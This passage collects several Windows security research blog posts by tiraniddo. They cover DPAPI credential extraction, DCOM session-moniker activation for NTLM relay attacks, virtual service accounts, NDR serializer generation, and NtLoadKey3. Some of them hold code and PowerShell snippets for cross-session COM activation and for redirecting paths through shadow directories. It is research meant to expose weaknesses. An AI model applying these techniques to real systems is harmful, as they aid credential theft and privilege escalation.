    5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
    If it all goes well you'll have all of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting it, but people obviously have done so before. I'll leave doing all this yourself as an exercise for the reader. I don't feel like providing an implementation.

    Why would you do this when there already exist plenty of other options? The main advantage, if you can call it that, is you never touch LSASS and definitely never inject any code into it. This wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.

    Standard Activating Yourself to Greatness

    By: tiraniddo
    27 April 2021 at 23:45

    This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're logged in as a user on session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage the DCOM activator would create the object on the lowest interactive session rather than session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

    The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

    Of course this already exists, you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeatedly told Microsoft they need to fix this activation route as it makes no sense that a non-administrator can do it. But my warnings have not been heeded. 

    If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

    The problem with testing this out is implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before they can be sent to the activator. Also the documentation is only for remote activation, which is not what we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

    No, sorry. There is an undocumented way though, if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how the session moniker activates the object and, if we're lucky, we can reuse that for our own purposes.

    Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at MkParseDisplayName, which is in OLE32.

    HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
          ULONG *pchEaten, LPMONIKER *ppmk) {
      HRESULT hr = FindLUAMoniker(pbc, szUserName, pchEaten, ppmk);
      if (hr == MK_E_UNAVAILABLE) {
        hr = FindSessionMoniker(pbc, szUserName, pchEaten, ppmk);
      }
      // Parse rest of moniker.
    }

    Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

    HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName,
                               ULONG *pchEaten, LPMONIKER *ppmk) {
      DWORD dwSessionId = 0;
      BOOL bConsole = FALSE;

      if (wcsnicmp(pszDisplayName, L"Session:", 8))
        return MK_E_UNAVAILABLE;

      if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
        bConsole = TRUE;
        *pchEaten = 15;
      } else {
        LPWSTR EndPtr;
        dwSessionId = wcstoul(pszDisplayName + 8, &EndPtr, 0);
        *pchEaten = EndPtr - pszDisplayName;
      }

      *ppmk = new CSessionMoniker(dwSessionId, bConsole);
      return S_OK;
    }

    This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation, instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

    Session:3!clsid:0002DF02-0000-0000-C000-000000000046

    The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.
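
    If you want to try this yourself, the example boils down to something like the following minimal sketch (error handling elided):

    #include <windows.h>
    #pragma comment(lib, "ole32.lib")
    #pragma comment(lib, "uuid.lib")

    int wmain() {
        CoInitializeEx(nullptr, COINIT_MULTITHREADED);
        IBindCtx* bind_ctx;
        CreateBindCtx(0, &bind_ctx);
        ULONG eaten;
        IMoniker* moniker;
        MkParseDisplayName(bind_ctx,
            L"Session:3!clsid:0002DF02-0000-0000-C000-000000000046",
            &eaten, &moniker);
        // Binding works right-to-left: the class moniker asks the session
        // moniker for IClassActivator, which activates cross-session.
        IUnknown* obj;
        moniker->BindToObject(bind_ctx, nullptr, IID_IUnknown, (void**)&obj);
        return 0;
    }

    Back to the internals: the class moniker's implementation looks like this.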

    HRESULT CClassMoniker::BindToObject(LPBC pbc,
      LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
      if (pmkToLeft) {
          IClassActivator* pClassActivator;
          pmkToLeft->BindToObject(pbc, nullptr,
            IID_IClassActivator, (void**)&pClassActivator);
          return pClassActivator->GetClassObject(m_clsid,
                CLSCTX_SERVER, 0, riid, ppv);
      }
      // ...
    }

    The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

    HRESULT CSessionMoniker::GetClassObject(
       REFCLSID pClassId, CLSCTX dwClsContext,
       LCID locale, REFIID riid, void **ppv) {
      IStandardActivator* pActivator;
      CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER,
        IID_IStandardActivator, (void**)&pActivator);

      ISpecialSystemProperties* pSpecialProperties;
      pActivator->QueryInterface(IID_ISpecialSystemProperties,
          (void**)&pSpecialProperties);
      pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
      return pActivator->StandardGetClassObject(pClassId, dwClsContext,
                                                NULL, riid, ppv);
    }

    Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interfaces or classes are officially documented of course (AFAIK).

    The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

    HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
      REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
      IStorage* pstg, int dwCount, MULTI_QI pResults[]);

    It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see if it works in that scenario. That's something for others to do.

    Creating your own Virtual Service Accounts

    By: tiraniddo
    26 October 2020 at 23:54

    Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer, what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts.

    A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured, which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with a password.

    To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.
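
    If you want to call it from native code, a minimal sketch looks like the following; note that both the prototype and the value of LOGON32_PROVIDER_VIRTUAL are reconstructions, as none of this is in the SDK headers:

    #include <windows.h>

    // Reconstructed prototype; the API isn't in the SDK headers.
    typedef BOOL (WINAPI* LogonUserExExW_t)(
        LPWSTR Username, LPWSTR Domain, LPWSTR Password,
        DWORD LogonType, DWORD LogonProvider, PTOKEN_GROUPS TokenGroups,
        PHANDLE Token, PSID* LogonSid, PVOID* ProfileBuffer,
        LPDWORD ProfileLength, PQUOTA_LIMITS QuotaLimits);

    #define LOGON32_PROVIDER_VIRTUAL 4 // assumed value

    // Needs SeTcbPrivilege; no password is required for a virtual account.
    HANDLE LogonVirtualAccount(LPWSTR Domain, LPWSTR Username) {
        auto pfn = (LogonUserExExW_t)GetProcAddress(
            LoadLibraryW(L"advapi32.dll"), "LogonUserExExW");
        HANDLE token = nullptr;
        if (!pfn(Username, Domain, nullptr, LOGON32_LOGON_SERVICE,
                 LOGON32_PROVIDER_VIRTUAL, nullptr, &token,
                 nullptr, nullptr, nullptr, nullptr))
            return nullptr;
        return token;
    }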

    The LogonUserExEx API only takes strings for the domain and username; you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

    So let's create our own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

    SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
    SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

    So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can logon the account you need to grant it a logon right. This is normally SeServiceLogonRight if you want a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

    If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to grant the logon right.

    PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

    Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

    PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
    PS> Format-NtToken $token
    AWESOME DOMAIN\USER

    As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want to document these features even though it could be a useful thing for normal developers.



    Using LsaManageSidNameMapping to add a name to a SID.

    By: tiraniddo
    24 October 2020 at 23:23

    I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

    LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

    and

    LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

    They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there are two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

    This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly, while you can add some SID-to-name mappings, this API won't let you do that for capability SIDs as there are the following calling restrictions:

    1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
    2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
    3. You must register a domain SID's name first to use the SID which includes it.
    Basically restriction 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15), and restriction 3 means we can't just go straight to adding the SID-to-name mapping as we need to have registered the domain with the API first; it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

    Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)
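
    If you'd rather do the same from native code, the core of such a tool looks roughly like this (the enum and structure definitions are reproduced from the unofficial header linked above, so treat the layouts as approximate; error handling elided):

    #include <windows.h>
    #include <ntsecapi.h>
    #include <wchar.h>
    #pragma comment(lib, "advapi32.lib")

    // Definitions reproduced from the unofficial header; not in Ntsecapi.h.
    typedef enum _LSA_SID_NAME_MAPPING_OPERATION_TYPE {
        LsaSidNameMappingOperation_Add,
        LsaSidNameMappingOperation_Remove,
        LsaSidNameMappingOperation_AddMultiple
    } LSA_SID_NAME_MAPPING_OPERATION_TYPE;

    typedef struct _LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT {
        UNICODE_STRING DomainName;
        UNICODE_STRING AccountName;
        PSID Sid;
        ULONG Flags;
    } LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT;

    typedef NTSTATUS (NTAPI* LsaManageSidNameMapping_t)(
        LSA_SID_NAME_MAPPING_OPERATION_TYPE OpType,
        PVOID OpInput,
        PVOID* OpOutput);

    // Pass Account = nullptr to register the domain, which must be done
    // before any account SIDs within it can be added.
    NTSTATUS AddSidMapping(PCWSTR Domain, PCWSTR Account, PSID Sid) {
        auto pfn = (LsaManageSidNameMapping_t)GetProcAddress(
            GetModuleHandleW(L"advapi32.dll"), "LsaManageSidNameMapping");
        LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT input = {};
        input.DomainName.Buffer = const_cast<PWSTR>(Domain);
        input.DomainName.Length = (USHORT)(wcslen(Domain) * sizeof(WCHAR));
        input.DomainName.MaximumLength = input.DomainName.Length;
        if (Account) {
            input.AccountName.Buffer = const_cast<PWSTR>(Account);
            input.AccountName.Length = (USHORT)(wcslen(Account) * sizeof(WCHAR));
            input.AccountName.MaximumLength = input.AccountName.Length;
        }
        input.Sid = Sid;
        PVOID output = nullptr;
        NTSTATUS status = pfn(LsaSidNameMappingOperation_Add, &input, &output);
        if (output)
            LsaFreeMemory(output); // contains an error code on failure
        return status;
    }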


    Generating NDR Type Serializers for C#

    By: tiraniddo
    1 July 2020 at 21:32
    As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

    I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser, but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create a standalone C# type serializer.

    First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

    To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

    interface TypeEncoders
    {
        typedef struct _TEST_TYPE
        {
            [unique, string] wchar_t* Name;
            DWORD Value;
        } TEST_TYPE;
    }

    You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

    interface TypeEncoders
    {
        typedef [encode, decode] TEST_TYPE;
    }

    Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

    If you look at the Decode function when compiled for a X64 target it should look like the following:

    void
    TEST_TYPE_Decode(
        handle_t _MidlEsHandle,
        TEST_TYPE * _pType)
    {
        NdrMesTypeDecode3(
             _MidlEsHandle,
             ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
             &TypeEncoders_ProxyInfo,
             TypePicklingOffsetTable,
             0,
             _pType);
    }

    The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

    The API takes 6 parameters (a rough declaration is shown after this list):
    1. The serialization handle, used to maintain state such as the current stream position, and which can be used multiple times to encode or decode more than one structure in a stream.
    2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
    3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
    4. A list of type offset arrays; these contain the byte offset into the format string (from the Proxy Info structure) for all type serializers.
    5. The index of the type offset in the 4th parameter.
    6. A pointer to the structure to serialize or deserialize.
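
    For reference, the declaration looks roughly like this (approximated from the SDK headers, so treat the exact types as a best guess):

    void RPC_ENTRY NdrMesTypeDecode3(
        handle_t                     Handle,
        PMIDL_TYPE_PICKLING_INFO     pPicklingInfo,
        PMIDL_STUBLESS_PROXY_INFO    pProxyInfo,
        const unsigned short* const* ArrTypeOffset,
        ULONG                        nTypeIndex,
        void*                        pObject);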

    Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

    To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

    Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

    mov     [rsp+28h], r14  ; pObject
    mov     dword ptr [rsp+20h], 5 ; nTypeIndex
    lea     r9, off_1800F3138 ; ArrTypeOffset
    lea     r8, stru_1800D5EA0 ; pProxyInfo
    lea     rdx, stru_1800DEAF0 ; pPicklingInfo
    mov     rcx, [rsp+68h]  ; Handle
    call    NdrMesTypeDecode3

    From this we can extract the following values:

    MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
    MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
    Type Offset Array = 0x1800F3138
    Type Offset Index = 5

    These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

    PS> $lib = Import-Win32Module KERBEROS.DLL
    PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
         -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

    As long as there was no error from this command the $types variable will now contain the parsed complex types; in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

    PS> Format-RpcComplexType $types -Pointer

    This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structures are wrapped inside Unique Pointers. This is the default when using the real RPC runtime, although, except for Conformant Structures, it isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

    You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

    In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface, not only can you avoid having to work out the offsets, as Get-RpcServer will automatically find the location, you can also use an additional feature to fix up the type information by extracting it from your private symbols.

    Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

    [
        uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
        version(1.0),
    ]
    interface RpcServer
    {
        int Test([in] handle_t hBinding, 
                 [unique] PPAC_DEVICE_INFO device_info);
    }

    Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

    #pragma comment(lib, "rpcrt4.lib")

    extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
        return new char[size];
    }

    extern "C" void __RPC_USER MIDL_user_free(void* p) {
        delete[] p;
    }

    int Test(
        handle_t hBinding,
        PPAC_DEVICE_INFO device_info) {
        printf("Test %p\n", device_info);
        return 0;
    }

    Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, so we just printf a unique string.

    Now parse the RPC server using Get-RpcServer and format the complex types.

    PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
    PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

    If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

    Before leaving this topic I should point out how to handle calls to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

    void
    TEST_TYPE_Decode(
        handle_t _MidlEsHandle,
        TEST_TYPE * _pType)
    {
        NdrMesTypeDecode2(
             _MidlEsHandle,
             ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
             &TypeEncoders_StubDesc,
             ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
             _pType);
    }
    1. The serialization handle.
    2. The MIDL_TYPE_PICKLING_INFO structure.
    3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
    4. A pointer into the format string for the start of the type.
    5. A pointer to the structure to serialize or deserialize.
    Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

    PS> Get-NdrComplexType -PicklingInfo 0x1234 `
        -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

    You'll notice that there's an offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

    PS> Get-NdrComplexType -PicklingInfo 0x1234 `
        -StubDesc 0x2345 -TypeOffset 2 -Module $lib

    Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

    OBJ_DONT_REPARSE is (mostly) Useless.

    By: tiraniddo
    23 May 2020 at 10:21
    Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE, isn't, at least not for protecting file system access.

    To quote the documentation, OBJ_DONT_REPARSE does the following:

    "If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

    This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

    PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
    Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

    Well that's not what you might expect; there should be no reparse points to access notepad, so what went wrong? Well, you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still, this does mean that it will also protect you from Registry Symbolic Links, as they also use a Reparse Point.

    I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying, especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK, which does what you'd want to avoid file system symbolic links, but that can only be accessed in kernel mode with IoCreateFileEx.

    Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

    PS> $d = Get-NtDirectory \Device
    PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
    PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
    PS> $f.FullPath
    \Device\HarddiskVolume3\Windows\notepad.exe

    Oh well...

    Silent Exploit Mitigations for the 1%

    By: tiraniddo
    22 May 2020 at 23:59
    With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

    One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

    While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably after being reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

    UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

    The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael's fault). And now finally NtLoadKey3. I've no idea why it went to 2, then to Ex, then back to 3; maybe it's some new Microsoft counting system. NtLoadKeyEx is partially exposed through the Win32 RegLoadKey and RegLoadAppKey APIs, although they only expose a subset of the system call's functionality.

    Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather than a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

    * Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

    When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

    NtLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, but what do I know...

    Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made a best guess with the following:
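
    // Best-guess reconstruction; every name here is invented by me.
    typedef struct _KEY_LOAD_HANDLE {
        ULONG Type;   // assumed to distinguish TrustKey, Event and Token
        HANDLE Handle;
    } KEY_LOAD_HANDLE, *PKEY_LOAD_HANDLE;

    NTSTATUS NTAPI NtLoadKey3(
        POBJECT_ATTRIBUTES TargetKey,  // attachment point
        POBJECT_ATTRIBUTES SourceFile, // hive file to load
        ULONG Flags,
        PKEY_LOAD_HANDLE Handles,      // typed handle list (TrustKey, Event
        ULONG HandleCount,             // and now the impersonation Token)
        ACCESS_MASK DesiredAccess,
        PHANDLE RootHandle,
        PVOID Unused                   // possibly PIO_STATUS_BLOCK, seemingly unused
    );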

    Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure, if they ever needed to extend the system call, whether to go for NtLoadKey4 or NtLoadKeyExEx, so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx, is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

    It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

    Writing Windows File System Drivers is Hard.

    By: tiraniddo
    20 May 2020 at 21:29
    A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

